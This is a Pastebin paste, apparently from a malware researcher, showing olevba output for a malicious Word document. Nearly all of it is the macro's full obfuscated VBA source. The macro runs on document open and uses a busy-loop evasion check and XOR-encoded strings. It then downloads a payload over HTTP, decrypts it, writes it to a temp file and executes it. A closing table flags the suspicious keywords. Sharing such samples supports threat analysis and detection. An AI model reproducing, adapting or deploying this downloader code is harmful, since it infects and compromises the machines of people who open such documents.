SHARE
TWEET

Malicious Word macro

dynamoo Nov 26th, 2015 112 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. olevba 0.31 - http://decalage.info/python/oletools
  2. Flags        Filename                                                        
  3. -----------  -----------------------------------------------------------------
  4. OLE:MAS-HB-V malware.doc
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, MHT=MHTML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, V=VBA strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: malware.doc
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: malware.doc - OLE stream: u'Macros/VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15. #If VBA7 Then
  16. Private Declare PtrSafe Function FiOhvKV5yT Lib "Lkt6o8pmvGrNO" Alias "PWYEuuBiV" (ByVal InHWN3QclIE As String, JHaob5RaBb0pUW As Long) As Long
  17. #Else
  18. Private Declare Function FiOhvKV5yT lib "Lkt6o8pmvGrNO" Alias "PWYEuuBiV"(byval InHWN3QclIE as String, JHaob5RaBb0pUW as Long ) as Long
  19. #End If
  20. Private GpkKWN3 As String
  21. Function N850BCurHo(ByVal LemiyA6QZnuCYC As String, XUn6QwHKyAv As String) As String
  22. PevSFR3rv0e2RZK = 39
  23. If PevSFR3rv0e2RZK + MJDM0hu5rU7Tdb > 1 Then
  24. MJDM0hu5rU7Tdb = 1 + 18
  25. '19 Clra 16 25
  26. End If
  27. MJDM0hu5rU7Tdb = 69
  28. '82 96 55 EHgu
  29. On Error Resume Next
  30. SQoiCuInevSFR3rv0 = 82
  31. If SQoiCuInevSFR3rv0 + NsNJTqkk3w > 1 Then
  32. NsNJTqkk3w = 72 + 29
  33. '32 GvriOI9 94 34
  34. End If
  35. NsNJTqkk3w = 44
  36. '59 39 1 HSHSe4Iv
  37. Dim GJE0Xk() As Byte, Uu3ahNk9NV(0 To 285) As Integer, CtAp9AJ0lBLNg() As Byte, NyTk5LjHttv, Hboyl0jeJwPSe, L7j2iquXfw8f, HlgcUkRQ3VZtHDYq, L8aV9L4vUWh As Boolean
  38. It9Acrpc7M = 30
  39. If It9Acrpc7M + DrjiAY5ezWAm > 1 Then
  40. DrjiAY5ezWAm = 53 + 31
  41. '26 RCZpY 14 49
  42. End If
  43. DrjiAY5ezWAm = 44
  44. '87 56 76 HPqsPooeMN9zRPs3
  45. GJE0Xk = StrConv(LemiyA6QZnuCYC, (64 + 1 + 64 - 1))
  46. VwkYpXxUG = 28
  47. If VwkYpXxUG + L7MtzHaiOhvKV > 1 Then
  48. L7MtzHaiOhvKV = 60 + 12
  49. '10 HbZCtRcd4hpmvGrNO 41 22
  50. End If
  51. L7MtzHaiOhvKV = 27
  52. '11 59 15 IlWZ1yGPfpiG
  53. CtAp9AJ0lBLNg() = StrConv(XUn6QwHKyAv, (64 + 5 + 64 - 5))
  54. C1aZX3huwbllRm = 94
  55. If C1aZX3huwbllRm + Orcx0psolAwdff4 > 1 Then
  56. Orcx0psolAwdff4 = 49 + 58
  57. '84 SgJEI38zx 78 45
  58. End If
  59. Orcx0psolAwdff4 = 71
  60. '20 20 72 TmV0hQRiff
  61. Hboyl0jeJwPSe = UBound(CtAp9AJ0lBLNg)
  62. FXBI0cjkxDlMD = 32
  63. If FXBI0cjkxDlMD + CJqQ7WXZNbh3E > 1 Then
  64. CJqQ7WXZNbh3E = 10 + 5
  65. '92 Fh3vFSWMRoJaMPe 28 22
  66. End If
  67. CJqQ7WXZNbh3E = 66
  68. '8 55 66 TytC1onRx
  69. For NyTk5LjHttv = 0 To (127.5 + 7 + 127.5 - 7)
  70. Uu3ahNk9NV(NyTk5LjHttv) = NyTk5LjHttv
  71. Next NyTk5LjHttv
  72. For NyTk5LjHttv = (128 + 2 + 128 - 2) To (142.5 + 2 + 142.5 - 2)
  73. Uu3ahNk9NV(NyTk5LjHttv) = NyTk5LjHttv Xor (128 + 7 + 128 - 7)
  74. Next NyTk5LjHttv
  75. For NyTk5LjHttv = 1 To (3 + 8 + 3 - 8)
  76. Uu3ahNk9NV(NyTk5LjHttv + (124.5 + 1 + 124.5 - 1)) = CtAp9AJ0lBLNg(Hboyl0jeJwPSe - NyTk5LjHttv)
  77. Uu3ahNk9NV(NyTk5LjHttv - 1) = CtAp9AJ0lBLNg(NyTk5LjHttv - 1) Xor ((127.5 + 6 + 127.5 - 6) - CtAp9AJ0lBLNg(Hboyl0jeJwPSe - NyTk5LjHttv))
  78. Next NyTk5LjHttv
  79. L8aV9L4vUWh = False
  80. L7j2iquXfw8f = 0
  81. HlgcUkRQ3VZtHDYq = 0
  82. For NyTk5LjHttv = 0 To UBound(GJE0Xk)
  83. If L7j2iquXfw8f > Hboyl0jeJwPSe Then L7j2iquXfw8f = 0
  84. If HlgcUkRQ3VZtHDYq > (142.5 + 6 + 142.5 - 6) And L8aV9L4vUWh = False Then HlgcUkRQ3VZtHDYq = 0: L8aV9L4vUWh = Not (L8aV9L4vUWh)
  85. If HlgcUkRQ3VZtHDYq > (142.5 + 1 + 142.5 - 1) And L8aV9L4vUWh = True Then HlgcUkRQ3VZtHDYq = (2.5 + 4 + 2.5 - 4): L8aV9L4vUWh = Not (L8aV9L4vUWh)
  86. GJE0Xk(NyTk5LjHttv) = (GJE0Xk(NyTk5LjHttv) Xor (Uu3ahNk9NV(HlgcUkRQ3VZtHDYq) Xor CtAp9AJ0lBLNg(L7j2iquXfw8f)))
  87. L7j2iquXfw8f = L7j2iquXfw8f + 1
  88. HlgcUkRQ3VZtHDYq = HlgcUkRQ3VZtHDYq + 1
  89. Next NyTk5LjHttv
  90. WuyDMqJlc9EExGn = 95
  91. If WuyDMqJlc9EExGn + MD6vOtbeXg08Apf > 1 Then
  92. MD6vOtbeXg08Apf = 46 + 67
  93. '56 FRKdQgv8nI4s 91 59
  94. End If
  95. MD6vOtbeXg08Apf = 3
  96. '71 91 4 Dr9gJTFhJbaTyvr
  97. N850BCurHo = StrConv(GJE0Xk(), (32 + 6 + 32 - 6))
  98. PQtmFj4 = 59
  99. If PQtmFj4 + Jy5AeFk8EPh5 > 1 Then
  100. Jy5AeFk8EPh5 = 81 + 87
  101. '16 Y28Ireu 57 60
  102. End If
  103. Jy5AeFk8EPh5 = 78
  104. '97 87 44 QSITYPlOzd9wZo5wK
  105. End Function
  106. Sub Document_Open()
  107. Y8zxt6Msdpa = 73
  108. If Y8zxt6Msdpa + IffQgv8nI4s > 1 Then
  109. IffQgv8nI4s = 85 + 23
  110. '38 NlQBbSx8CvjG5n 18 78
  111. End If
  112. IffQgv8nI4s = 69
  113. '70 67 77 SK2Okf9
  114. On Error Resume Next
  115. PKaAwdff4 = 59
  116. If PKaAwdff4 + UGTAOx > 1 Then
  117. UGTAOx = 3 + 71
  118. '91 BpX8trlI24f 4 95
  119. End If
  120. UGTAOx = 18
  121. '51 79 94 Seuq3p2oT0
  122. Dim DrqjA As Long, YsFjPuyG As Long, YhNAv As Long, V6cC3scUY4zddH99R As Long
  123. Pn2j04QQZ = 39
  124. If Pn2j04QQZ + PhB4lG17FG95 > 1 Then
  125. PhB4lG17FG95 = 15 + 88
  126. '41 WCYB5Gg 83 81
  127. End If
  128. PhB4lG17FG95 = 35
  129. '33 6 14 T85wPN55plLSy
  130. DrqjA = 97933779: YsFjPuyG = 0: YhNAv = 0
  131. A9brznS9 = 39
  132. If A9brznS9 + NZmCtQE > 1 Then
  133. NZmCtQE = 3 + 59
  134. '89 Gn0vbN 52 64
  135. End If
  136. NZmCtQE = 1
  137. '17 96 57 WjrO2i
  138. For YsFjPuyG = 1 To DrqjA
  139. YhNAv = YhNAv + 1
  140. Next YsFjPuyG
  141. SC5Gsa2L8x9 = 53
  142. If SC5Gsa2L8x9 + YQfGqOLqlO > 1 Then
  143. YQfGqOLqlO = 61 + 11
  144. '61 C5Ml9aEwx 82 71
  145. End If
  146. YQfGqOLqlO = 7
  147. '1 44 86 JbPkJ1m84n
  148. If YhNAv = DrqjA Then
  149. MBLZvB3itxy = 28
  150. If MBLZvB3itxy + VGYVXAeUo > 1 Then
  151. VGYVXAeUo = 10 + 37
  152. '56 OwEp3rMGmB 24 23
  153. End If
  154. VGYVXAeUo = 98
  155. '98 51 67 YfcNwjt
  156. Dim JdQXv As Integer, Glu As String
  157. For JdQXv = 6 To 931
  158. Glu = Glu + JdQXv
  159. Next
  160. QMC2wbN5Ml9a = 30
  161. If QMC2wbN5Ml9a + JLJBTPQC0v8nPRi > 1 Then
  162. JLJBTPQC0v8nPRi = 75 + 66
  163. '23 H1FnrBinFMXuiTr7q 26 88
  164. End If
  165. JLJBTPQC0v8nPRi = 27
  166. '38 53 33 MommQAvjlo
  167. V6cC3scUY4zddH99R = FiOhvKV5yT("Woslk2fer8", 13)
  168. NEVW = 27
  169. If NEVW + AbNNqkZ7MBaO > 1 Then
  170. AbNNqkZ7MBaO = 85 + 37
  171. '9 TkPX49TibqGBJxshx 40 47
  172. End If
  173. AbNNqkZ7MBaO = 52
  174. '36 84 40 PATiSzZ0SHp
  175. If Err.Number = (26.5 + 1 + 26.5 - 1) Then
  176. ALJBTPQC0v8nPRi = 63
  177. If ALJBTPQC0v8nPRi + OgAQFxX3NoRJzF0 > 1 Then
  178. OgAQFxX3NoRJzF0 = 76 + 90
  179. '49 Bdt9CAhqI 73 72
  180. End If
  181. OgAQFxX3NoRJzF0 = 4
  182. '11 16 48 TaXuqpe9brzn
  183. Err.Clear
  184. GdnAtw6pW2Ddd = 21
  185. If GdnAtw6pW2Ddd + Bn4b3DBA1 > 1 Then
  186. Bn4b3DBA1 = 57 + 95
  187. '33 LntwxxRUQfG 22 2
  188. End If
  189. Bn4b3DBA1 = 62
  190. '79 80 77 UWnIyleBDeMMQkBoa
  191. GpkKWN3 = NQfyvvczlB
  192. DFx2CkP6uLciomp = 15
  193. If DFx2CkP6uLciomp + YxN3SKC7rbd4Y0 > 1 Then
  194. YxN3SKC7rbd4Y0 = 37 + 69
  195. '98 HPrpdzlNL 13 16
  196. End If
  197. YxN3SKC7rbd4Y0 = 34
  198. '79 69 26 G1kJpKeLjvHFTRm
  199. Yo0cZy9rsLWc833
  200. Else
  201. Cfh6QC = 1
  202. If Cfh6QC + SahItA7q > 1 Then
  203. SahItA7q = 51 + 28
  204. '23 HCOoCyyztc 12 46
  205. End If
  206. SahItA7q = 41
  207. '84 27 74 Ktvz0LH4pnr
  208. PGYDqcNIiY
  209. CVrJQakokY = 20
  210. If CVrJQakokY + Y3Eih8b7DEsD5mvG > 1 Then
  211. Y3Eih8b7DEsD5mvG = 49 + 34
  212. '4 ILogRYp5sBH4wIB 69 73
  213. End If
  214. Y3Eih8b7DEsD5mvG = 13
  215. '68 76 4 PMgXukJXdidChXD
  216. End If
  217. GD8V9NxlguCc = 31
  218. If GD8V9NxlguCc + Cbj3Mm1 > 1 Then
  219. Cbj3Mm1 = 14 + 40
  220. '60 Re2uopTYl 27 26
  221. End If
  222. Cbj3Mm1 = 2
  223. '75 28 70 PYPrON7WK2JzAOBM
  224. Else
  225. SkzzbsvfSyz = 30
  226. If SkzzbsvfSyz + OKqrI > 1 Then
  227. OKqrI = 17 + 31
  228. '88 Kj3Mm1XX0vAd4 14 13
  229. End If
  230. OKqrI = 43
  231. '50 56 40 HViUsnLUZHz
  232. PGYDqcNIiY
  233. OEjP2fwXjVZgphAd = 48
  234. If OEjP2fwXjVZgphAd + O216Y38Y2IQM > 1 Then
  235. O216Y38Y2IQM = 50 + 91
  236. '94 PGa6IxNKb0 13 58
  237. End If
  238. O216Y38Y2IQM = 21
  239. '77 8 70 Yn2V1Js3WRXItf4P
  240. End If
  241. B1bVxGQc8 = 31
  242. If B1bVxGQc8 + CHKnEMtktO > 1 Then
  243. CHKnEMtktO = 49 + 94
  244. '84 Vcn9fY7O 41 45
  245. End If
  246. CHKnEMtktO = 8
  247. '46 56 72 J375rwVno
  248. End Sub
  249. Sub B12q0RLAU(YAz6wXfrk6f5dv As String, Dz1TOyYXiEI9X1 As String)
  250. Dim Pp3rrlsgf94PVXP6U As Object
  251. VjnPC7wODO4Jx = 68
  252. If VjnPC7wODO4Jx + Rqk3uXtteGEZk > 1 Then
  253. Rqk3uXtteGEZk = 89 + 1
  254. '93 FhOzcnGer 16 48
  255. End If
  256. Rqk3uXtteGEZk = 50
  257. '91 94 13 SgNKb0
  258. Set Pp3rrlsgf94PVXP6U = CreateObject(N850BCurHo(Chr$(245) + Chr$(206) + Chr$(216) + Chr$(207) + Chr$(245) + Chr$(178) + Chr$(58) + Chr$(59) + Chr$(54) + Chr$(78) + Chr$(14) + Chr$(32) + Chr$(52) + Chr$(81) + Chr$(39) + Chr$(47) + Chr$(54) + Chr$(55) + Chr$(46) + Chr$(23) + Chr$(25) + Chr$(53) + Chr$(40) + Chr$(75) + Chr$(1) + Chr$(52), "BBT9zYURYi"))
  259. Oy07ZXh375rw = 66
  260. If Oy07ZXh375rw + IafTt7I6 > 1 Then
  261. IafTt7I6 = 95 + 81
  262. '51 IPwAQevkxJXOs 16 21
  263. End If
  264. IafTt7I6 = 60
  265. '15 24 50 KL1NNvX9M
  266. With Pp3rrlsgf94PVXP6U.CREATEtEXTFILe(YAz6wXfrk6f5dv)
  267. FnGerJrNK5Me = 59
  268. If FnGerJrNK5Me + D7E2ALYP > 1 Then
  269. D7E2ALYP = 18 + 87
  270. '79 MHSxliGq 57 96
  271. End If
  272. D7E2ALYP = 78
  273. '60 87 7 RwchV
  274. .WRiTE (Dz1TOyYXiEI9X1)
  275. WKjDoHr5iKzkpVwg2 = 72
  276. If WKjDoHr5iKzkpVwg2 + QcB20uYVs9TKjI > 1 Then
  277. QcB20uYVs9TKjI = 24 + 23
  278. '53 T86tdYttAG8H2 34 39
  279. End If
  280. QcB20uYVs9TKjI = 24
  281. '71 27 86 HZonet6216Y38Y2I
  282. .Close
  283. JFqOLICehY = 88
  284. If JFqOLICehY + H5Gi4s6Oh > 1 Then
  285. H5Gi4s6Oh = 28 + 83
  286. '91 YfJW0b1SpgJJ 19 39
  287. End If
  288. H5Gi4s6Oh = 79
  289. '5 80 54 R2EarR9dQ6
  290. End With
  291. Bhv4rFyKDKXTO = 95
  292. If Bhv4rFyKDKXTO + KKSWCkv > 1 Then
  293. KKSWCkv = 96 + 38
  294. '41 T61Q0H4n2uSis 59 5
  295. End If
  296. KKSWCkv = 68
  297. '25 55 18 Qcwh3Dw
  298. Set Pp3rrlsgf94PVXP6U = Nothing
  299. RyXDLrCTEUdfgw = 27
  300. If RyXDLrCTEUdfgw + UUTkQyfMsfxt > 1 Then
  301. UUTkQyfMsfxt = 76 + 27
  302. '48 TkQyfMsf 37 72
  303. End If
  304. UUTkQyfMsfxt = 66
  305. '10 52 84 VFnmj
  306. End Sub
  307. Sub AzGSEXj0198(YgWPvZP1GI6MAx6 As Long)
  308. EvGXxSr = 14
  309. If EvGXxSr + MwNvccke53sI > 1 Then
  310. MwNvccke53sI = 15 + 12
  311. '21 X9w2oS3F 92 78
  312. End If
  313. MwNvccke53sI = 92
  314. '51 3 74 NYr9z
  315. Dim HTvFxkntQn7 As Long
  316. Wsu2EarR9dQ = 17
  317. If Wsu2EarR9dQ + CvU49QGChAHz2YU > 1 Then
  318. CvU49QGChAHz2YU = 77 + 24
  319. '58 C1MjOEfC3K7tGTTZ 8 58
  320. End If
  321. CvU49QGChAHz2YU = 80
  322. '68 4 71 QinpPH
  323. HTvFxkntQn7 = Timer + YgWPvZP1GI6MAx6
  324. Do While Timer < HTvFxkntQn7
  325. DoEvents
  326. Loop
  327. P26QLde5nGzV = 25
  328. If P26QLde5nGzV + Ab4PHJ9i3Pqz > 1 Then
  329. Ab4PHJ9i3Pqz = 8 + 34
  330. '54 C3bLu3db 21 20
  331. End If
  332. Ab4PHJ9i3Pqz = 95
  333. '69 22 64 IxyptdjM
  334. End Sub
  335. Sub Yo0cZy9rsLWc833()
  336. HtdjMDb8fByV = 35
  337. If HtdjMDb8fByV + PgGhGyO1BQj > 1 Then
  338. PgGhGyO1BQj = 38 + 1
  339. '40 QUJFvPh2RB8 50 66
  340. End If
  341. PgGhGyO1BQj = 45
  342. '7 24 25 EpUcR3zs
  343. Dim G5UczWAvCd8 As String, Jy6OeQYzbkLfj4 As Object
  344. IBDicnTaoZ = 62
  345. If IBDicnTaoZ + SCrQim0cZ3bLu3d > 1 Then
  346. SCrQim0cZ3bLu3d = 83 + 94
  347. '86 BbDpG 10 42
  348. End If
  349. SCrQim0cZ3bLu3d = 44
  350. '85 87 6 Tee9PKR9nm
  351. G5UczWAvCd8 = Environ(N850BCurHo(Chr$(207) + Chr$(227) + Chr$(223) + Chr$(162) + Chr$(241) + Chr$(189) + Chr$(81), "INw1nf6o9PlQb")) & N850BCurHo(Chr$(231) + Chr$(236) + Chr$(254) + Chr$(248) + Chr$(214) + Chr$(130) + Chr$(19) + Chr$(62) + Chr$(5) + Chr$(27) + Chr$(41) + Chr$(40) + Chr$(85) + Chr$(71) + Chr$(55) + Chr$(16) + Chr$(43) + Chr$(16), "Jl3XOXwRJDj") & GpkKWN3 & N850BCurHo(Chr$(128) + Chr$(203) + Chr$(215) + Chr$(211), "YTfXIPQQT")
  352. SDKtuw = 90
  353. If SDKtuw + P9MZ56WLHCqol > 1 Then
  354. P9MZ56WLHCqol = 62 + 74
  355. '88 FKO 21 72
  356. End If
  357. P9MZ56WLHCqol = 70
  358. '2 82 87 X6sACIZZnE1Gh8
  359. Set Jy6OeQYzbkLfj4 = CreateObject(N850BCurHo(Chr$(193) + Chr$(211) + Chr$(241) + Chr$(215) + Chr$(218) + Chr$(205) + Chr$(58) + Chr$(32) + Chr$(54) + Chr$(125) + Chr$(63) + Chr$(3) + Chr$(51) + Chr$(22) + Chr$(27) + Chr$(17) + Chr$(26), "AJZmEsS"))
  360. Hpwu6Bl = 72
  361. If Hpwu6Bl + YeBQPr1wAvqimGhpX > 1 Then
  362. YeBQPr1wAvqimGhpX = 95 + 2
  363. '30 HCXroKyiQXE3xbOh 71 73
  364. End If
  365. YeBQPr1wAvqimGhpX = 91
  366. '11 1 57 VbiBYEmq
  367. Jy6OeQYzbkLfj4.Open N850BCurHo(Chr$(193) + Chr$(232) + Chr$(243), "Bm1NBcQZfBt9jXRy3"), N850BCurHo(Chr$(246) + Chr$(192) + Chr$(199) + Chr$(186) + Chr$(137) + Chr$(191) + Chr$(101) + Chr$(36) + Chr$(8) + Chr$(10) + Chr$(47) + Chr$(34) + Chr$(42) + Chr$(16) + Chr$(52) + Chr$(83) + Chr$(57) + Chr$(45) + Chr$(29) + Chr$(14) + Chr$(125) + Chr$(48) + Chr$(36) + Chr$(87) + Chr$(62) + Chr$(67) + Chr$(120) + Chr$(58) + Chr$(13) + Chr$(11) + Chr$(102), "GFSoL5LKaq") & NQfyvvczlB, 0
  368. Ofj = 9
  369. If Ofj + W5u9qigla6 > 1 Then
  370. W5u9qigla6 = 59 + 81
  371. '69 U7QtWvY42JwDW 5 72
  372. End If
  373. W5u9qigla6 = 16
  374. '84 6 17 QdLhShR
  375. Jy6OeQYzbkLfj4.seND
  376. If Jy6OeQYzbkLfj4.Status = (100 + 8 + 100 - 8) Then
  377. P92RvX1OyI = 77
  378. If P92RvX1OyI + Tlpy4pOJB > 1 Then
  379. Tlpy4pOJB = 1 + 33
  380. '61 AGoCC 3 78
  381. End If
  382. Tlpy4pOJB = 96
  383. '42 33 89 Bu3P6
  384. GoTo KNCjFjtSsUu5k
  385. H0oXKiA6m = 76
  386. If H0oXKiA6m + XCPhIXE1Gh8 > 1 Then
  387. XCPhIXE1Gh8 = 4 + 23
  388. '90 HiJtOsluH 89 65
  389. End If
  390. XCPhIXE1Gh8 = 65
  391. '18 34 58 TOzDi3HsPBkL8
  392. Else
  393. AE7aUiUy1UeC = 8
  394. If AE7aUiUy1UeC + JkwSoTVijR3AJ > 1 Then
  395. JkwSoTVijR3AJ = 25 + 26
  396. '23 HXRWM 32 77
  397. End If
  398. JkwSoTVijR3AJ = 90
  399. '4 62 87 EeVp
  400. Jy6OeQYzbkLfj4.Open N850BCurHo(Chr$(252) + Chr$(251) + Chr$(222), "UgAiwo1aaBuAD6"), N850BCurHo(Chr$(213) + Chr$(191) + Chr$(198) + Chr$(254) + Chr$(188) + Chr$(129) + Chr$(31) + Chr$(49) + Chr$(30) + Chr$(30) + Chr$(46) + Chr$(76) + Chr$(38) + Chr$(73) + Chr$(58) + Chr$(2) + Chr$(0) + Chr$(53) + Chr$(74) + Chr$(127) + Chr$(65) + Chr$(43) + Chr$(2) + Chr$(73) + Chr$(63) + Chr$(66) + Chr$(118) + Chr$(71) + Chr$(61) + Chr$(3) + Chr$(80), "QyqM4B6") & NQfyvvczlB, 0
  401. Cuo52olTIbaOgrZ = 94
  402. If Cuo52olTIbaOgrZ + GWaauGfzntoPg1G > 1 Then
  403. GWaauGfzntoPg1G = 63 + 84
  404. '95 TNk2R 87 11
  405. End If
  406. GWaauGfzntoPg1G = 43
  407. '45 86 89 IGdAaRv6BeMop0Yaa
  408. Jy6OeQYzbkLfj4.seND
  409. KDEkUqsxrgrl = 9
  410. If KDEkUqsxrgrl + NKenP > 1 Then
  411. NKenP = 49 + 26
  412. '44 Mj3bKHSNEWmeIz 89 79
  413. End If
  414. NKenP = 36
  415. '40 3 41 YY5zn3cWqt5
  416. If Jy6OeQYzbkLfj4.Status = (100 + 3 + 100 - 3) Then
  417. NpvGZ5rgZCRTUq = 61
  418. If NpvGZ5rgZCRTUq + QLq6CSMT43j > 1 Then
  419. QLq6CSMT43j = 38 + 33
  420. '22 Q3G7TIMG 57 51
  421. End If
  422. QLq6CSMT43j = 94
  423. '63 84 95 LLcyM2peGdAaRv6
  424. GoTo KNCjFjtSsUu5k
  425. VKk7tqLDBK = 93
  426. If VKk7tqLDBK + NMYJ7d > 1 Then
  427. NMYJ7d = 66 + 74
  428. '24 Uf3dQjvfSG 74 96
  429. End If
  430. NMYJ7d = 84
  431. '20 14 58 DMan98xPTEU
  432. End If
  433. SdBIZAZSNSJfKpj = 52
  434. If SdBIZAZSNSJfKpj + GKdU3l > 1 Then
  435. GKdU3l = 6 + 44
  436. '4 Uv4zBtOced 50 84
  437. End If
  438. GKdU3l = 8
  439. '85 80 68 DuZIfom1Aeq1A
  440. End If
  441. Rr4tm1pHovm = 22
  442. If Rr4tm1pHovm + OOkRBHQv2V > 1 Then
  443. OOkRBHQv2V = 95 + 48
  444. '91 TRENEsFLooSq 88 43
  445. End If
  446. OOkRBHQv2V = 7
  447. '41 14 22 PpmSWyrtSkqQ
  448. Exit Sub
  449. TLNBz3utPpNHz3 = 97
  450. If TLNBz3utPpNHz3 + YAPZSY4KGk8Mmi > 1 Then
  451. YAPZSY4KGk8Mmi = 17 + 84
  452. '83 D0QxudBKVKW 59 59
  453. End If
  454. YAPZSY4KGk8Mmi = 12
  455. '28 52 6 GKxbCDNIqKCpcq
  456. KNCjFjtSsUu5k:
  457. RLbJpjLUKSC17r = 22
  458. If RLbJpjLUKSC17r + VqWASNqmC4f3jp > 1 Then
  459. VqWASNqmC4f3jp = 95 + 48
  460. '91 PfamB 88 43
  461. End If
  462. VqWASNqmC4f3jp = 7
  463. '41 14 22 OFE
  464. AzGSEXj0198 (1 + 9 + 1 - 9)
  465. AC6Seuk = 41
  466. If AC6Seuk + GqPWcAOvvXX > 1 Then
  467. GqPWcAOvvXX = 26 + 19
  468. '41 CQLLEMenC 73 2
  469. End If
  470. GqPWcAOvvXX = 43
  471. '20 38 83 DofpgnNPhc
  472. B12q0RLAU G5UczWAvCd8, N850BCurHo(StrConv(Jy6OeQYzbkLfj4.resPOnSeBodY, (32 + 3 + 32 - 3)), N850BCurHo(Chr$(211) + Chr$(235) + Chr$(202) + Chr$(160) + Chr$(216) + Chr$(249) + Chr$(112) + Chr$(89) + Chr$(15) + Chr$(111) + Chr$(86), "MWwoL0A7qSjF"))
  473. O5V6ScwVCAZ = 27
  474. If O5V6ScwVCAZ + PXxhQZeju > 1 Then
  475. PXxhQZeju = 15 + 50
  476. '45 IngzthtttId 88 57
  477. End If
  478. PXxhQZeju = 77
  479. '89 81 4 KHzH6kuqC0TL80
  480. CreateObject(N850BCurHo(Chr$(251) + Chr$(229) + Chr$(196) + Chr$(204) + Chr$(220) + Chr$(252) + Chr$(32) + Chr$(88) + Chr$(26) + Chr$(39) + Chr$(28) + Chr$(45) + Chr$(33), "HFEg5mRqAFsJAXISn")).Run """" & G5UczWAvCd8 & """"
  481. RDyJ7Y = 52
  482. If RDyJ7Y + HukbQ > 1 Then
  483. HukbQ = 93 + 41
  484. '26 EM6EP9G1 19 41
  485. End If
  486. HukbQ = 73
  487. '2 43 20 HErA9V4SK2W
  488. Set Jy6OeQYzbkLfj4 = Nothing
  489. End Sub
  490. Sub PGYDqcNIiY()
  491. FSytexzdRD = 9
  492. If FSytexzdRD + BIds252 > 1 Then
  493. BIds252 = 24 + 4
  494. '64 M9kCIWJkz39tjuedSsx 55 56
  495. End If
  496. BIds252 = 53
  497. '63 34 21 WJkz39tjuedS
  498. TimeValue 77
  499. OZymfbItYx = UCase(6)
  500. YIMdX5LppqEnQYKt = QBColor(20)
  501. SHIpR8r0U6XL = CurDir
  502. Hour 23
  503. IN1K98kRLjtt6n3hA = Dir("VVdgLL8J8GsT50BFu")
  504. If CByte(41) = True Then FOtBdLFOEImukpB = 8676
  505. NPer 33, 37, 12
  506. Rate 48, 64, 44
  507. Command
  508. Month 5
  509. Rnd
  510. AppActivate 95
  511. Load BgtwAmm
  512. Tan 96
  513. Err.Raise 93
  514. Sqr 3
  515. If CDbl(74) = True Then Hy485SM = 87
  516. DDB 2, 33, 84, 83
  517. Year 14
  518. DateAdd "IE7XitPAb4xP", 94, 83
  519. Weekday 32
  520. JjNFS = Day(87)
  521. Loc 47
  522. IGe6BI0fWwS = Cos(10)
  523. ChDir 43
  524. Second 8
  525. IMVlVpey78hH6 = CVDate(85)
  526. ChDrive 26
  527. Err.Clear
  528. G04GvszyHcz7cUz = 59
  529. If G04GvszyHcz7cUz + EG1gFhqZ > 1 Then
  530. EG1gFhqZ = 57 + 88
  531. '95 RvBGuX 1 85
  532. End If
  533. EG1gFhqZ = 33
  534. '62 48 18 GpCqyVrr
  535. End Sub
  536. Function NQfyvvczlB() As String
  537. YJIxHpJTHPyKYz = 94
  538. If YJIxHpJTHPyKYz + CAwmLM > 1 Then
  539. CAwmLM = 25 + 32
  540. '38 KEALS7PCSeJF8XbJ 22 69
  541. End If
  542. CAwmLM = 26
  543. '84 54 46 XCUmU
  544. Dim KHK50vUSWRXp As Long
  545. Rvwe6AD2e2R2 = 81
  546. If Rvwe6AD2e2R2 + Q8eCMd1 > 1 Then
  547. Q8eCMd1 = 6 + 5
  548. '36 J1m983Xb0Ro 43 48
  549. End If
  550. Q8eCMd1 = 32
  551. '80 9 94 PxfC3IiEmZ
  552. KBTQl75TBRxS:
  553. Hz9biQhNoy = 22
  554. If Hz9biQhNoy + UE8BFCtLq3pdRI > 1 Then
  555. UE8BFCtLq3pdRI = 84 + 96
  556. '33 QhNoy 49 29
  557. End If
  558. UE8BFCtLq3pdRI = 89
  559. '80 81 78 IHPSHJLrgQCWdpaQ0
  560. Randomize
  561. MAvFduSXDsQzeGbCs = 62
  562. If MAvFduSXDsQzeGbCs + Rf9cavtzvtaGn8 > 1 Then
  563. Rf9cavtzvtaGn8 = 8 + 97
  564. '55 VB4TDZNH6xVvAx 58 21
  565. End If
  566. Rf9cavtzvtaGn8 = 59
  567. '70 85 65 PhrAJP4Z5
  568. KHK50vUSWRXp = Int((4999.5 + 5 + 4999.5 - 5) * Rnd)
  569. EW1hJ0wrkq9c = 44
  570. If EW1hJ0wrkq9c + J9KlHAPO6Be > 1 Then
  571. J9KlHAPO6Be = 78 + 73
  572. '17 O9YtO 59 7
  573. End If
  574. J9KlHAPO6Be = 18
  575. '10 33 39 Q7pMOMRcYyZHZd
  576. If KHK50vUSWRXp < (49.5 + 6 + 49.5 - 6) Then GoTo KBTQl75TBRxS
  577. N7hDrZw3PV = 12
  578. If N7hDrZw3PV + L14gSB4TDZNH > 1 Then
  579. L14gSB4TDZNH = 2 + 58
  580. '62 A6xVvAxgzJqDs 25 37
  581. End If
  582. L14gSB4TDZNH = 73
  583. '89 69 30 HaAooKzRxBoNXCkkC
  584. NQfyvvczlB = KHK50vUSWRXp
  585. V0CqzFv63ukddr = 61
  586. If V0CqzFv63ukddr + Ca1OA > 1 Then
  587. Ca1OA = 37 + 26
  588. '6 Pfmhh9O5qs4y 66 83
  589. End If
  590. Ca1OA = 84
  591. '81 91 62 KL8QYMjG9cmlo
  592. End Function
  593.  
  594. +------------+----------------------+-----------------------------------------+
  595. | Type       | Keyword              | Description                             |
  596. +------------+----------------------+-----------------------------------------+
  597. | AutoExec   | Document_Open        | Runs when the Word document is opened   |
  598. | Suspicious | Open                 | May open a file                         |
  599. | Suspicious | Run                  | May run an executable file or a system  |
  600. |            |                      | command                                 |
  601. | Suspicious | CreateObject         | May create an OLE object                |
  602. | Suspicious | Chr                  | May attempt to obfuscate specific       |
  603. |            |                      | strings                                 |
  604. | Suspicious | Xor                  | May attempt to obfuscate specific       |
  605. |            |                      | strings                                 |
  606. | Suspicious | CreateTextFile       | May create a text file                  |
  607. | Suspicious | Environ              | May read system environment variables   |
  608. | Suspicious | Write                | May write to a file (if combined with   |
  609. |            |                      | Open)                                   |
  610. | Suspicious | AppActivate          | May control another application by      |
  611. |            |                      | simulating user keystrokes              |
  612. | Suspicious | Lib                  | May run code from a DLL                 |
